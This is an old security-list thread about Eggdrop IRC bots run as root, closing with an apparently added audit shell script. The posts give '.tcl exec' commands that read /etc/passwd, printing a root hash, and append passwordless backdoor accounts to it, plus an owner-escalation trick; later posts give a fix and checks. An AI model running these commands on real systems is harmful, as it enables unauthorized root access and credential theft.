Eggdrop bots can access files all over the system if you're owner and the bot runs with root permissions. You can get the passwd when you're the owner of the bot, and also modify it if the bot is running with the root permissions.

Tested in an Eggdrop bot 1.0p

.tcl exec cat /etc/passwd
[1:21] Tcl: root:zWCF/X7irjQ4E:0:0:root:/:/bin/bash
[1:21] Tcl: bin:*:1:1:bin:/bin:
[1:21] Tcl: daemon:*:2:2:daemon:/sbin:
[1:21] Tcl: adm:*:3:4:adm:/var/adm:
[1:21] Tcl: lp:*:4:7:lp:/var/spool/lpd:
[1:21] Tcl: sync:*:5:0:sync:/sbin:/bin/sync

You can also try

.tcl exec echo "stupid::394:100:/:/bin/bash" >> /etc/passwd

and telnet to the host of the bot.

You can try to make .rhosts and all shit you may think.

Think 'bout that ;)

------------------------------------------------------------------------------------

> Eggdrop bots can access files all over the system if you're owner and
> the bot runs with root permissions.

1) who runs a bot as root?
2) who gives away owner-access?

Come on!....

echo "forgot::0:0::/:/bin/sh" >> /etc/passwd; echo "If you forgot your password, then login as 'forgot' with no password, and do "passwd " >> /etc/issue

What a huge security hole!

------------------------------------------------------------------------------------

>> Eggdrop bots can access files all over the system if you're owner and
>> the bot runs with root permissions.
>
>1) who runs a bot as root?
>2) who gives away owner-access?

I have come across many bots being run as root. So people should look out. And in earlier versions of Eggdrop there is one serious bug to become OWNER when someone has master access. I will demonstrate on eggdrop 0.9p, this bug still works in lotsa newer versions as well:

.set owner Chotaire
.chattr Chotaire +n

When another owner tries to remove your owner and master access, you will still be able to re-"own" yourself unless they have detected you in the .set owner variable. That's it...

Now for FIXING YOUR TCL problem, take a look at this one...

$eggdrop/src/eggdrop.h

#undef ENABLE_TCL

recompile your bot, and that's it... no more problems.

-------------------------------------------------------------------------------------
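A check for the two conditions the thread turns on (a bot running as root, and Tcl still compiled in), added here as an example and not part of any post above. It assumes the bot's binary is named eggdrop and that ENABLE_TCL in src/eggdrop.h controls the .tcl command as the last post describes; the process list and header files are constructed samples.

```shell
#!/bin/sh
# Added example: audit helpers, not code from the thread or from Eggdrop.

# Read "user pid command" lines on stdin and print the PID of every
# eggdrop process owned by root. Assumption: the binary is named "eggdrop".
root_eggdrops() {
    awk '($1 == "root" || $1 == "0") && $3 ~ /^(.*\/)?eggdrop$/ { print $2 }'
}

# Exit 0 if the header's last ENABLE_TCL directive is a #define (the .tcl
# command is still compiled in); exit 1 if it was #undef'd or never defined.
tcl_enabled() {
    awk '
        /^[ \t]*#[ \t]*define[ \t]+ENABLE_TCL([ \t]|$)/ { state = 1 }
        /^[ \t]*#[ \t]*undef[ \t]+ENABLE_TCL([ \t]|$)/  { state = 0 }
        END { exit(state ? 0 : 1) }
    ' "$1"
}

# Run both checks: $1 = path to src/eggdrop.h, process list on stdin.
# Prints findings and returns non-zero if there are any.
# Live use: ps -eo user=,pid=,comm= | audit_eggdrop "$eggdrop/src/eggdrop.h"
audit_eggdrop() {
    rc=0
    pids=$(root_eggdrops | tr '\n' ' ')
    if [ -n "$pids" ]; then
        echo "FAIL: eggdrop running as root, pid(s): $pids"; rc=1
    fi
    if tcl_enabled "$1"; then
        echo "WARN: ENABLE_TCL is defined in $1; owners can run .tcl"; rc=1
    fi
    return $rc
}

# Constructed sample data (not taken from a real host).
SAMPLE_PS='root      412 eggdrop
irc       977 eggdrop
root        1 init'
demo=$(mktemp -d)
printf '#define ENABLE_TCL\n' > "$demo/before.h"
printf '#define ENABLE_TCL\n#undef ENABLE_TCL\n' > "$demo/after.h"
printf '%s\n' "$SAMPLE_PS" | audit_eggdrop "$demo/before.h" || true
printf 'irc 977 eggdrop\n' | audit_eggdrop "$demo/after.h" && echo "OK: clean"
rm -rf "$demo"
```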